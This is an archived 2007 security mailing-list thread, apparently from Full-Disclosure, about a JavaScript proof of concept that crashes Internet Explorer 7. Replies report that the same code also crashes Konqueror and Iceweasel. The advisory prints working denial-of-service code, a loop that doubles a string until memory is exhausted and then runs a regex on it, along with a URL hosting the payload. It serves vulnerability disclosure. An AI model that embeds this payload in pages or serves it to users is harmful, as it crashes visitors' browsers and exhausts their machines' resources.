Re: Internet Explorer Crash



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nope. Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it
didn't even flinch. No OOM-killing here.

On the other hand, Konqueror 3.5.5 "release 45.4" churned swap madly for
about five minutes (the machine continued to run well enough if just a
bit slower) until Konq sig-sixed itself.

Cheers

The Anarcat wrote:
Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)

I would think that Firefox and most browsers implementing javascript
would die an horrible OOM death on this.

A.

On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
while (z.length <=
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX
N1X/wJSO4U4Sx3z5Yn0S6Tk=
=T/tc
-----END PGP SIGNATURE-----



Relevant Pages

  • Re: Microsoft closes another deal, is redhat next?
    ... The thing that is really embarrassing about the above error message, ... In my case Konqueror is set to identify ... So obviously what's going on here is the script is looking for the word ... I assume the script then acts as if the browser HAS to be ...
    (Fedora)
  • Re: [Full-disclosure] Internet Explorer Crash
    ... This also works under Konqueror. ... There should be an implimentation on ALL browsers that a loop such large is ... IE 7 is vulnerable to a script which causes the browser to hang. ...
    (Full-Disclosure)
  • Re: CGI script parameter error.
    ... with Safari 5.0.2 and Konqueror 4.4.4 it does not. ... Here is the url of the script itself: ... work directly as the target for a web browser. ...
    (alt.html)
  • Re: CGI script parameter error.
    ... with Safari 5.0.2 and Konqueror 4.4.4 it does not. ... This CGI script is served in the form of a GIF image. ... image that is generated *is* received okay by the browser. ...
    (alt.html)
  • Sencha Touch--Support 2 browsers in just 228K!
    ... It is advertised as the first "HTML5 framework" based ... very little of the script relates to HTML5. ... several of its key features rely on UA-based browser sniffing. ... iPhone/iPod/iPad devices account for 90% of the mobile market. ...
    (comp.lang.javascript)